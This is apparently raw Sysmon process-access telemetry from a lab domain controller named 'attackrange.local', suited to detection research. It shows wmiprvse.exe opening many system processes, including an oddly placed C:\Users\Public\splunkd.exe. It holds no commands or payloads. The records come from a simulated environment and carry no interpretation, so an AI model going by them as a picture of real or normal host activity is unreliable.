15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028134Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028133Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028132Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028131Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028130Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028129Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028128Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028127Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028126Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028125Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028124Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028123Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028122Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028121Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028120Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028119Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028118Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028117Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028116Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028115Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 